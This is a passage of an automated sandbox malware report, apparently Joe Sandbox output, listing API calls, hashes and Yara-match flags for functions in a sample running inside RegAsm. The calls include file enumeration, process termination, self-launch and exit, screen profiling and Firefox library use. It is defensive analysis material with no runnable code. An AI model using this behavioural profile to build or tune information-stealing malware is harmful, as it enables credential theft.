                                                                                                                                                                                                                                                    • API ID: lstrcat$File$CloseCreateFind$AllocHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1847592606-0
                                                                                                                                                                                                                                                    • Opcode ID: 169741b3fe6da7ffec9413cafaec04529173838a0da687c86c5844cd2d93b0ec
                                                                                                                                                                                                                                                    • Instruction ID: 65b04e9cde4619abf843a48e71063a32351bbc74cf755bb2dfb2c7197d8a34fc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 169741b3fe6da7ffec9413cafaec04529173838a0da687c86c5844cd2d93b0ec
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4441A5B5910218ABDB14EBA1DC86EEE7738AF49704F00459EF605A7190D778A788CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274D0), ref: 00416BDC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274D4), ref: 00416BF6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF750), ref: 00416C34
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF5A0), ref: 00416C48
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C5C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C6A
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,004274D8), ref: 00416C7C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C90
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00416D31
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00416D40
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$File$CloseCreateFind$AllocHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1847592606-0
                                                                                                                                                                                                                                                    • Opcode ID: 583f826395b8c42f364dbb12656910e4defcf830f51ef111fb98e76dfe398a60
                                                                                                                                                                                                                                                    • Instruction ID: d4e61c7d2469dbfde97b878399e7cefc5a86f05ed22ec7b99aee685cb5fe1f2d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 583f826395b8c42f364dbb12656910e4defcf830f51ef111fb98e76dfe398a60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE41B5B5900218ABDB14EBA0DC86FEE7738BF48700F00459EF605A7190D778A788CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C720039
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C720041
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C720075
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C720082
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000048), ref: 6C720090
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C720104
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C72011B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C72005B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                                                                                                                                                                                                    • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                                                                                                                                                                                                    • API String ID: 3012294017-637075127
                                                                                                                                                                                                                                                    • Opcode ID: 53c85837e2ec971ec27e019e0d71744c2accceaffec29351e2693e88335db9c6
                                                                                                                                                                                                                                                    • Instruction ID: ad5ec930ac1b3bb457703eac7455a45a09c0ef61675022f902f8c9ec2458959f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53c85837e2ec971ec27e019e0d71744c2accceaffec29351e2693e88335db9c6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A241BFB16003449FCB10CF64C944A9ABBF1FF49358F94452EED5A83B50DB31B815CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6E7EA7
                                                                                                                                                                                                                                                    • malloc.MOZGLUE(00000001), ref: 6C6E7EB3
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECAB0: EnterCriticalSection.KERNEL32(?), ref: 6C6ECB49
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C6ECBB6
                                                                                                                                                                                                                                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C6E7EC4
                                                                                                                                                                                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C6E7F19
                                                                                                                                                                                                                                                    • malloc.MOZGLUE(?), ref: 6C6E7F36
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6E7F4D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                    • API String ID: 204725295-2564639436
                                                                                                                                                                                                                                                    • Opcode ID: 826704e34041b4a4694eb868851ed5a1019f0e94737a53c168ae5f9dfe12b096
                                                                                                                                                                                                                                                    • Instruction ID: 6853b8b547c6dd60f44645ff76a49adb167428c2df5e72c78ce27987e93f9fe2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 826704e34041b4a4694eb868851ed5a1019f0e94737a53c168ae5f9dfe12b096
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B31D861E0434897DB019B68CD489FEB778EF96218F44972AEC4997612FB30A688C395
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00411915
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407426,0040D964), ref: 00411946
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00407426,0040D964), ref: 0041194D
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0041195C
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00001001,00000000), ref: 004119BD
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004119CC
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004119D3
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                                    • String ID: %hs
                                                                                                                                                                                                                                                    • API String ID: 396451647-2783943728
                                                                                                                                                                                                                                                    • Opcode ID: 1b1b298537e8615da89eb02e101515a9b5f7a736ce16ed7ed7a698d5f4632f13
                                                                                                                                                                                                                                                    • Instruction ID: a9ab091606b9989cac714e5a552ca49587b7bdda62f4a341ea418e64b0062893
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b1b298537e8615da89eb02e101515a9b5f7a736ce16ed7ed7a698d5f4632f13
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 263180B6900219ABDB10DB94DC85EEFB77DEB09710F10452AFA15A3290D7385E44CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041408E
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041409A
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 004140AF
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00414151
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041415E
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00414170
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00414181
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset$lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                                                    • API String ID: 1943017432-4251816714
                                                                                                                                                                                                                                                    • Opcode ID: 6c7e6d6870100d342dba8cbe625f1f0b183ca985fe3232087398b11a3ef270c3
                                                                                                                                                                                                                                                    • Instruction ID: 301d0e976fd4260c5951cc4f96d1137b8d220ab616e3c601254b5500b3555b67
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c7e6d6870100d342dba8cbe625f1f0b183ca985fe3232087398b11a3ef270c3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D3130B1C00248EBDB15EFE5CC85EEEB779AF18304F40457EA20677192DB785A49CB64
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateDCA.GDI32(015C2E20,00000000,00000000,00000000), ref: 00410A7A
                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00410A85
                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410A90
                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00410A9B
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415B9A,?,00000000,?,Display Resolution: ,00000000,?,00427274,00000000), ref: 00410AA8
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415B9A,?,00000000,?,Display Resolution: ,00000000,?,00427274,00000000,?), ref: 00410AAF
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00410ABF
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                    • String ID: %dx%d
                                                                                                                                                                                                                                                    • API String ID: 3940144428-2206825331
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C6E4C2F
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E7DC), ref: 6C6E4C82
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C6E4C89
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                                                                    • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                    • API String ID: 2801635615-1351931279
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL ref: 6C6E3EEE
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6E3FDC
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL ref: 6C6E4006
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6E40A1
                                                                                                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C6E3CCC), ref: 6C6E40AF
                                                                                                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C6E3CCC), ref: 6C6E40C2
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C6E4134
                                                                                                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,00000000,?,00000000,00000040,?,?,?,?,?,6C6E3CCC), ref: 6C6E4143
                                                                                                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,00000000,?,00000000,00000040,?,?,?,?,?,6C6E3CCC), ref: 6C6E4157
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3680524765-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,6C6F3F47,?,?,?,6C6F3F47,6C6F1A70,?), ref: 6C6D207F
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000E5,6C6F3F47,?,6C6F3F47,6C6F1A70,?), ref: 6C6D20DD
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C6F3F47,6C6F1A70,?), ref: 6C6D211A
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E744,?,6C6F3F47,6C6F1A70,?), ref: 6C6D2145
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C6F3F47,6C6F1A70,?), ref: 6C6D21BA
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E744,?,6C6F3F47,6C6F1A70,?), ref: 6C6D21E0
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E744,?,6C6F3F47,6C6F1A70,?), ref: 6C6D2232
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                                                                                                                                                                                    • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                                                                                                                                                                                    • API String ID: 889484744-884734703
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C728273), ref: 6C729D65
                                                                                                                                                                                                                                                    • free.MOZGLUE(6C728273,?), ref: 6C729D7C
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C729D92
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C729E0F
                                                                                                                                                                                                                                                    • free.MOZGLUE(6C72946B,?,?), ref: 6C729E24
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?), ref: 6C729E3A
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C729EC8
                                                                                                                                                                                                                                                    • free.MOZGLUE(6C72946B,?,?,?), ref: 6C729EDF
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?), ref: 6C729EF5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 956590011-0
